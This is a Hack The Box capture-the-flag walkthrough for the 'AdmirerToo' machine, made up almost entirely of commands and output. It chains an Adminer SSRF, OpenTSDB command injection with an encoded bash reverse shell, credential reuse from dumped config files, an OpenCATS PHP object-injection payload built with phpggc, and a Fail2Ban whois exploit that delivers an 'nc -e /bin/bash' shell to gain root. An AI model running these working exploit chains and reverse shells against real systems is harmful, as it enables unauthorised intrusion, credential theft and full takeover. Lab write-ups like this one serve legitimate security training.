# Get domain name
`view-source:http://10.129.96.181/a`

```
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at <a href="mailto:webmaster@admirer-gallery.htb">10.129.96.181</a> Port 80</address>
</body></html>
```

# Add domain hosts file
```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# cat /etc/hosts 
127.0.0.1       localhost
127.0.1.1       kali
10.129.96.181   admirer-gallery.htb
```

# Find subdomains
`gobuster vhost -u 'http://admirer-gallery.htb/' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 40`

```
Found: db.admirer-gallery.htb (Status: 200) [Size: 2569]
```
##### /etc/hosts
```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# cat /etc/hosts 
127.0.0.1       localhost
127.0.1.1       kali
10.129.96.181   admirer-gallery.htb db.admirer-gallery.htb
```

# Enum Domain
`http://db.admirer-gallery.htb/`

`gobuster dir -u 'http://db.admirer-gallery.htb/' -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,dat,bak, -t 40`
```
/.htaccess            (Status: 403) [Size: 338]
/.htpasswd.bak        (Status: 403) [Size: 338]
/.htaccess.php        (Status: 403) [Size: 338]
/.htpasswd.           (Status: 403) [Size: 338]
/.htaccess.txt        (Status: 403) [Size: 338]
/.htpasswd.php        (Status: 403) [Size: 338]
/.htaccess.html       (Status: 403) [Size: 338]
/.htpasswd.txt        (Status: 403) [Size: 338]
/.htaccess.dat        (Status: 403) [Size: 338]
/.htpasswd            (Status: 403) [Size: 338]
/.htaccess.bak        (Status: 403) [Size: 338]
/.htpasswd.html       (Status: 403) [Size: 338]
/.htaccess.           (Status: 403) [Size: 338]
/.htpasswd.dat        (Status: 403) [Size: 338]
/index.php            (Status: 200) [Size: 2547]
/manual               (Status: 301) [Size: 384] [--> http://db.admirer-gallery.htb/manual/]                                                      
/plugins              (Status: 301) [Size: 385] [--> http://db.admirer-gallery.htb/plugins/]
```

`http://db.admirer-gallery.htb/plugins/`

```
Index of /plugins
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[DIR]	data/	2021-07-21 09:12 	- 	 
[ ]	oneclick-login.php	2021-07-07 08:01 	2.7K	 
[ ]	plugin.php	2021-07-07 07:46 	10K	 
Apache/2.4.38 (Debian) Server at db.admirer-gallery.htb Port 80
```

# SSRF EXPLOIT ADMINER

`python2 redirect.py -p 80 http://127.0.0.1/`

Capture request but not sent to repeater modify at the moment.

```
auth_drive=elastic
auth_server=[HTB IP]
```

```
POST / HTTP/1.1
Host: db.admirer-gallery.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://db.admirer-gallery.htb/
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
Origin: http://db.admirer-gallery.htb
Connection: close
Cookie: adminer_sid=81bluvvv5dilc64813sojrm182; adminer_key=d23da436e7dbe460e259791592e76088; adminer_version=4.8.1; adminer_permanent=c2VydmVy-bG9jYWxob3N0-YWRtaXJlcl9ybw%3D%3D-YWRtaXJlcg%3D%3D%3Aia4x%2Bx6PKAe2XzE1UOi0AW7TpygnL2Ee+ZWxhc3RpY3M%3D-MTAuMTAuMTQuNTM%3D-YWRtaXJlcl9ybw%3D%3D-YWRtaXJlcg%3D%3D%3Aia4x%2Bx6PKAe2XzE1UOi0AW7TpygnL2Ee+ZWxhc3RpY3NlYXJjaA%3D%3D-MTAuMTAuMTQuNTM%3D-YWRtaXJlcl9ybw%3D%3D-YWRtaXJlcg%3D%3D%3Aia4x%2Bx6PKAe2XzE1UOi0AW7TpygnL2Ee
Upgrade-Insecure-Requests: 1

auth%5Bdriver%5D=elastic&auth%5Bserver%5D=10.10.14.53&auth%5Busername%5D=admirer_ro&auth%5Bpassword%5D=1w4nn4b3adm1r3d2%21&auth%5Bdb%5D=admirer&auth%5Bpermanent%5D=1
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# python2 redirect.py -p 80 http://127.0.0.1/
serving at port 80
10.129.96.181 - - [11/Mar/2022 13:51:11] "GET / HTTP/1.0" 301 -
10.129.96.181 - - [11/Mar/2022 13:51:11] "GET / HTTP/1.0" 301 -
```

# Inspect other ports

`python2 redirect.py -p 80 http://127.0.0.1:4242/` 

```html
<!DOCTYPE html><html><head><meta http-equiv=content-type content="text/html;charset=utf-8"><title>OpenTSDB</title> <style><!-- body{font-family:arial,sans-serif;margin-left:2em}A.l:link{color:#6f6f6f}A.u:link{color:green}.fwf{font-family:monospace;white-space:pre-wrap}//--></style><script type=text/javascript language=javascript src=s/queryui.nocache.js></script></head> <body text=#000000 bgcolor=#ffffff><table border=0 cellpadding=2 cellspacing=0 width=100%><tr><td rowspan=3 width=1% nowrap><img src=s/opentsdb_header.jpg><td>&nbsp;</td></tr><tr><td><font color=#507e9b><b></b></td></tr><tr><td>&nbsp;</td></tr></table><div id=queryuimain></div><noscript>You must have JavaScript enabled.</noscript><iframe src=javascript:'' id=__gwt_historyFrame tabIndex=-1 style=position:absolute;width:0;height:0;border:0></iframe><table width=100% cellpadding=0 cellspacing=0><tr><td class=subg><img alt="" width=1 height=6></td></tr></table></body></html>
```

`python2 redirect.py -p 80 http://127.0.0.1:4242/api/version`

```json
{"short_revision":"14ab3ef","repo":"/home/hobbes/OFFICIAL/build","host":"clhbase","version":"2.4.0","full_revision":"14ab3ef8a865816cf920aa69f2e019b7261a7847","repo_status":"MINT","user":"hobbes","branch":"master","timestamp":"1545014415"}
```

`python2 redirect.py -p 80 'http://127.0.0.1:4242/api/suggest?type=metrics'`

```
["http.stats.web.hits"]
```

# OpenTSDB Exploit RCE

`python2 redirect.py -p 80 'http://127.0.0.1:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system("ping+-c+1+10.10.14.53")]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# python2 redirect.py -p 80 'http://127.0.0.1:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system("ping+-c+1+10.10.14.53")]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'
serving at port 80
10.129.96.181 - - [11/Mar/2022 14:21:50] "GET / HTTP/1.0" 301 -
10.129.96.181 - - [11/Mar/2022 14:21:50] "GET / HTTP/1.0" 301 -
```

`tcpdump -i tun0 icmp`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:21:50.374324 IP admirer-gallery.htb > 10.10.14.53: ICMP echo request, id 3572, seq 1, length 64
14:21:50.374373 IP 10.10.14.53 > admirer-gallery.htb: ICMP echo reply, id 3572, seq 1, length 64
```

`python2 redirect.py -p 80 'http://127.0.0.1:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system("%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%35%33%2f%31%32%33%34%20%30%3e%26%31%27")]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'`

`bash -c 'bash -i >& /dev/tcp/10.10.14.53/1234 0>&1'`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# python2 redirect.py -p 80 'http://127.0.0.1:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system("%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%35%33%2f%31%32%33%34%20%30%3e%26%31%27")]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'
serving at port 80
10.129.96.181 - - [11/Mar/2022 14:30:38] "GET / HTTP/1.0" 301 -
```

`nc -lvnp 1234`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# nc -lvnp 1234                                         
listening on [any] 1234 ...
connect to [10.10.14.53] from (UNKNOWN) [10.129.96.181] 43064
bash: cannot set terminal process group (527): Inappropriate ioctl for device
bash: no job control in this shell
opentsdb@admirertoo:/$ id
id
uid=1000(opentsdb) gid=1000(opentsdb) groups=1000(opentsdb)
opentsdb@admirertoo:/$
```

# Enum server

`bash /tmp/linpeas.sh`

```
╔══════════╣ Searching passwords in config PHP files
define('DATABASE_HOST', 'localhost');                                                                                                            
define('DATABASE_NAME', 'cats_dev');
define('DATABASE_PASS', 'adm1r3r0fc4ts');
define('DATABASE_USER', 'cats');
```

```
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports                                                                         
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                                                                
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
```

`cat /var/www/adminer/plugins/data/servers.php`

```
opentsdb@admirertoo:/var/www/adminer/plugins/data$ cat servers.php 
<?php
return [
  'localhost' => array(
//    'username' => 'admirer',
//    'pass'     => 'bQ3u7^AxzcB7qAsxE3',
// Read-only account for testing
    'username' => 'admirer_ro',
    'pass'     => '1w4nn4b3adm1r3d2!',
    'label'    => 'MySQL',
    'databases' => array(
      'admirer' => 'Admirer DB',
    )
  ),
];
```

# Use password on Jennifer user

`ssh jennifer@10.129.96.181`

```
jennifer : bQ3u7^AxzcB7qAsxE3
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# ssh jennifer@10.129.96.181
The authenticity of host '10.129.96.181 (10.129.96.181)' can't be established.
ED25519 key fingerprint is SHA256:6GHqCefcB0XKD8lrY40SKb5COmsxVdTiXV4NYplmxbY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.96.181' (ED25519) to the list of known hosts.
jennifer@10.129.96.181's password: 
Linux admirertoo 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Feb 22 21:02:14 2022 from 10.10.14.8
jennifer@admirertoo:~$ id
uid=1002(jennifer) gid=100(users) groups=100(users)
jennifer@admirertoo:~$
```

# Port Forward 8080

`ssh -L 8081:127.0.0.1:8080 jennifer@10.129.96.181`

`http://127.0.0.1:8081/`

# We need change password to access admin panel

`mysql -D cats_dev -u cats -padm1r3r0fc4ts`

```
jennifer@admirertoo:~$ mysql -D cats_dev -u cats -padm1r3r0fc4ts
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 114605
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [cats_dev]>
```

`select user_name,password from user;`

```
MariaDB [cats_dev]> select user_name,password from user;
+----------------+----------------------------------+
| user_name      | password                         |
+----------------+----------------------------------+
| admin          | dfa2a420a4e48de6fe481c90e295fe97 |
| cats@rootadmin | cantlogin                        |
| jennifer       | f59f297aa82171cc860d76c390ce7f3e |
+----------------+----------------------------------+
```

`python3`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# python3
Python 3.9.10 (main, Feb 22 2022, 13:54:07) 
[GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib
>>> hashlib.md5(b'doom').hexdigest()
'b4f945433ea4c369c12741f62a23ccc0'
>>>
```

`update user set password = 'b4f945433ea4c369c12741f62a23ccc0' where user_name='admin';`

```
MariaDB [cats_dev]> update user set password = 'b4f945433ea4c369c12741f62a23ccc0' where user_name='admin';
Query OK, 1 row affected (0.001 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [cats_dev]>
```

# Now we can access

`http://127.0.0.1:8081/index.php?m=home`

```
admin : doom
```

# OPENCAT EXPLOIT SERIALIZING

- `echo test > hola.txt`
- `/opt/phpggc/phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/hola.txt hola.txt`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# echo test > hola.txt                                                   
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# /opt/phpggc/phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/hola.txt hola.txt
a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A5%3A%22test%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A17%3A%22%2Fdev%2Fshm%2Fhola.txt%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D
```

```
GET /index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A5%3A%22test%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A17%3A%22%2Fdev%2Fshm%2Fhola.txt%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:8081/index.php?m=activity
Cookie: CATS=f5dnfa3vq17nqi0vlu130a47s1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```

# The file belongs to devel

```
jennifer@admirertoo:~$ ls -la /dev/shm/
total 4
drwxrwxrwt  2 root  root    60 Mar 11 21:06 .
drwxr-xr-x 16 root  root  3080 Mar 11 15:43 ..
-rw-r--r--  1 devel devel   48 Mar 11 21:06 hola.txt
jennifer@admirertoo:~$ cat /dev/shm/hola.txt 
[{"Expires":1,"Discard":false,"Value":"test\n"}]
```

# We can write in those directories

`find / -group devel 2>/dev/null`

```
jennifer@admirertoo:~$ find / -group devel 2>/dev/null
/dev/shm/hola.txt
/opt/opencats/INSTALL_BLOCK
/usr/local/src
/usr/local/etc
```

# Fail2Ban exploit

`fail2ban-server -V`

```
jennifer@admirertoo:~$ fail2ban-server -V
Fail2Ban v0.10.2

Copyright (c) 2004-2008 Cyril Jaquier, 2008- Fail2Ban Contributors
Copyright of modifications held by their respective authors.
Licensed under the GNU General Public License v2 (GPL).
```

`echo '}]|. [10.10.14.53]' > whois.conf`
```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# echo '}]|. [10.10.14.53]' > whois.conf
```

`/opt/phpggc/phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf whois.conf`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# /opt/phpggc/phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf whois.conf 
a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A19%3A%22%7D%5D%7C.+%5B10.10.14.53%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D
```

- `echo '~| bash -c "nc -e /bin/bash 10.10.14.53 4444" &' > shell`
- `ncat -nvlkp 43 -c "cat ./shell"`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# echo '~| bash -c "nc -e /bin/bash 10.10.14.53 4444" &' > shell 
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# ncat -nvlkp 43 -c "cat ./shell"
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::43
Ncat: Listening on 0.0.0.0:43
```

```
GET /index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A19%3A%22%7D%5D%7C.+%5B10.10.14.53%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
eferer: http://127.0.0.1:8081/index.php?m=activity
Cookie: CATS=f5dnfa3vq17nqi0vlu130a47s1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```

`cat /usr/local/etc/whois.conf`

```
jennifer@admirertoo:~$ cat /usr/local/etc/whois.conf
[{"Expires":1,"Discard":false,"Value":"}]|. [10.10.14.53]\n"}]
```

`whois 10.10.14.53`

```
jennifer@admirertoo:~$ whois 10.10.14.53
~| bash -c "nc -e /bin/bash 10.10.14.53 4444" &
```

`ssh root@10.129.96.181`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# ssh root@10.129.96.181
root@10.129.96.181's password: 
Permission denied, please try again.
root@10.129.96.181's password: 
Permission denied, please try again.
root@10.129.96.181's password: 

Connection closed by 10.129.96.181 port 22
```

`nc -lvnp 4444`

```
┌──(root㉿kali)-[~/htb/Box/Linux/AdmirerToo]
└─# nc -lvnp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.96.181.
Ncat: Connection from 10.129.96.181:43376.
id
uid=0(root) gid=0(root) groups=0(root)
```


https://www.tenable.com/plugins/was/112910 \
https://github.com/advisories/GHSA-x5r2-hj5c-8jx6 \
http://opentsdb.net/docs/build/html/api_http/index.html#api-versioning \
http://opentsdb.net/docs/build/html/api_http/suggest.html \
https://github.com/OpenTSDB/opentsdb/issues/2051 \
https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html \
https://github.com/ambionics/phpggc.git \
https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm
